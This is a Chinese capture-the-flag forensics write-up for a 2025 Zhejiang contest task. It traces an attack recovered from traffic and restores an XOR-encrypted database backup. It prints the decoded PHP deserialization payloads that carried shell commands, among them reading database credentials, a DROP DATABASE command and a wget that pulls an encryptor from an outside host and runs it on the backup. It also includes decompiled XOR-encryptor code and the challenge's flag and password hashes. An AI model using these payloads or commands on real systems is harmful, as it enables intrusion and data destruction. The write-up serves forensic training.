202508_浙江省网络安全测试职业职工技能竞赛_misc-1

Tags:流量分析，RE，XOR

0x00. 题目

你是一名资深的网络安全分析取证师，受命调查一家IT公司近期遭遇的一起严重网络安全事件。

该公司主要业务是为中小型企业提供定制化管理系统和数据分析服务。

由于该公司内部管理缺陷，导致未上线项目被放置在生产环境中，由于项目的未完成度较高，存在一定的安全漏洞。

昨日，在其开发成员测试时发现服务离线，数据库无响应，多次尝试无果后该公司安全部门介入，发现数据库已经被删库，同时备份文件也被疑似恶意程序加密。

安全部门第一时间隔离了该机器，并且使用文件管理系统下载了被加密的数据库文件。

我们在全流量设备中捕获到下面的流量，并且通过技术手段还原疑似恶意程序的样本。

现在，你需要还原攻击路径，分析恶意程序，尽快恢复数据库数据，找到其中的管理员账户，提交其passwd部分作为flag。

---

附件路径：https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称：202508_浙江省网络安全测试职业职工技能竞赛_misc-1.zip

0x01. WP

1. 部分HTTP流量

分析流量请求如下：

# urldecode-base64-base64
=====================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:4:"ls";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}db_backup.sql
file.php
index.php
log
management_test.php
mysql.php
===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:20:"cat mysql.php";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}<?php
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$dbname = "ctf";
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {die("连接失败: " . $conn->connect_error);
}
?>
===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:64:"mysql -u root -p123456 -e "DROP DATABASE ctf;"";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:48:"wget http://100.68.76.120:8000/ency";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}--2025-07-12 22:01:13--  http://100.68.76.120:8000/ency
Connecting to 100.68.76.120:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 767136 (749K) [application/octet-stream]
Saving to: 'ency'0K .......... .......... .......... .......... ..........  6% 4.57M 0s50K .......... .......... .......... .......... .......... 13% 8.41M 0s100K .......... .......... .......... .......... .......... 20% 49.2M 0s150K .......... .......... .......... .......... .......... 26% 4.73M 0s200K .......... .......... .......... .......... .......... 33% 34.3M 0s250K .......... .......... .......... .......... .......... 40% 52.2M 0s300K .......... .......... .......... .......... .......... 46% 9.25M 0s350K .......... .......... .......... .......... .......... 53% 42.6M 0s400K .......... .......... .......... .......... .......... 60% 46.5M 0s450K .......... .......... .......... .......... .......... 66% 45.1M 0s500K .......... .......... .......... .......... .......... 73% 10.3M 0s550K .......... .......... .......... .......... .......... 80% 43.2M 0s600K .......... .......... .......... .......... .......... 86% 48.3M 0s650K .......... .......... .......... .......... .......... 93% 49.5M 0s700K .......... .......... .......... .......... ......... 100% 54.6M=0.05s2025-07-12 22:01:13 (15.4 MB/s) - 'ency' saved [767136/767136]
===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:20:"chmod 777 ency";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:4:"ls";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}db_backup.sql
ency
file.php
index.php
log
management_test.php
mysql.php
===================
data=O:14:"ServiceUtility":3:{s:13:"processedData";s:32:"./ency -f db_backup.sql";s:22:" ServiceUtility config";a:2:{s:8:"logLevel";s:4:"INFO";s:12:"featureFlags";a:2:{s:17:"reporting_enabled";b:1;s:10:"debug_mode";b:0;}}s:7:"logFile";s:28:"/var/log/service_utility.log";}===================

发现主要加密命令为./ency -f db_backup.sql

2. 导出加密文件，并进行分析加密脚本

尝试本地使用文本文件运行该脚本，发现类似XOR运算

root@kali:~/Desktop# chmod 777 ency
root@kali:~/Desktop# echo 123 > 123.txt
root@kali:~/Desktop# xxd 123.txt 
00000000: 3132 330a                                123.
root@kali:~/Desktop# ./ency -f 123.txt
root@kali:~/Desktop# xxd 123.txt 
00000000: 7dcb 2437                                }.$7
root@kali:~/Desktop# ./ency -f 123.txt
root@kali:~/Desktop# xxd 123.txt 
00000000: 3132 330a                                123.
root@kali:~/Desktop#

3. 尝试将导出的文件内容再次XOR运算

root@kali:~/Desktop# xxd -r -p db_hex.txt > sql.sql
root@kali:~/Desktop# ./ency -f sql.sql 
root@kali:~/Desktop# cat sql.sql
/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.5.28-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: ctf
-- ------------------------------------------------------
-- Server version       10.5.28-MariaDB-0+deb11u2/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;--
-- Table structure for table `flag`
--DROP TABLE IF EXISTS `flag`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `flag` (`id` varchar(300) DEFAULT NULL,`data` varchar(300) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;--
-- Dumping data for table `flag`
--LOCK TABLES `flag` WRITE;
/*!40000 ALTER TABLE `flag` DISABLE KEYS */;
INSERT INTO `flag` VALUES ('flag','flag{U_Ins3rt_&_I_c4tch_U}');
/*!40000 ALTER TABLE `flag` ENABLE KEYS */;
UNLOCK TABLES;--
-- Table structure for table `users`
--DROP TABLE IF EXISTS `users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `users` (`id` varchar(300) DEFAULT NULL,`username` varchar(300) DEFAULT NULL,`password` varchar(300) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;--
-- Dumping data for table `users`
--LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES ('1','admin','900a29466b514e02b3022831b5a92c79'),('2','user_alpha','482c811da5d5b4bc6d497ffa98491e38'),('3','john_doe','bb77d0d3b3f239fa5db73bdf27b8d29a'),('4','jane_smith','06c219e5bc8378f3a8a3f83b4b7e4649'),('5','guest_user','0fb9cbecb7b8881511c69c39db643e8c'),('6','testuser_01','342df5b036b2f28184536820af6d1caf'),('7','developer_x','dc067f8a150df19383bc33d7ac9032f7'),('8','analyst_y','d6ad4995f74341687290bb92107a9c39'),('9','manager_z','1cd459b6c56534eeb2cf848bf151ce85'),('10','support_agent','288682ec5f2450588bb37a4523d11616'),('11','marketing_pro','e1fb50d7ed9ceae6caac7c51022f3645'),('12','sales_rep','cd26234360c3897cd563332b757393fd'),('13','hr_specialist','1352d599c37d71566eab74d2f7ecff42'),('14','finance_guy','9ff0398e281fa1e84850f6db699bec91'),('15','engineer_bob','ab337c34de23ee3b5a126419954ce825'),('16','designer_sue','79be69e97a4f153614d703a1c6cf7d83'),('17','qa_tester','33d08e374efa9be3b4872558de8036f0'),('18','product_owner','49b92ea844cf0b26f38725a70e878e31'),('19','scrum_master','4d514d555862b808ab75292ae7daf682'),('20','data_scientist','27819cfe72583a34d13a40bb74154c91');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;-- Dump completed on 2025-07-12 21:19:28
root@kali:~/Desktop# 

4. 提交admin对应MD5即可

5. 附：ency代码逆向

// 1. 解析命令行参数（仅支持 -f）
for (i = 0LL; ; i = optarg) {v7 = getopt(argc, argv, &unk_47A004); // 选项字符串可能为 "f:"if (v7 == -1) break;if (v7 != 'f') exit(1); // 非 -f 选项则退出
}// 2. 打开输入文件和临时输出文件
v6 = fopen64(i, "rb");      // 输入文件（由 -f 指定）
v5 = fopen64("/tmp/temp_encrypted_file", "wb"); // 临时输出文件// 3. 逐字节异或加密/解密
for (j = 0; ; j = (j + 1) % key_len) {v4 = getc(v6);          // 读取输入文件的一个字节if (v4 == -1) break;    // 文件结束则退出循环// 异或操作：明文/密文 ^ 密钥 -> 密文/明文fputc(v4 ^ encryption_key[j], v5); // 写入临时文件
}// 4. 替换原文件
fclose(v6);
fclose(v5);
rename("/tmp/temp_encrypted_file", i); // 覆盖原始文件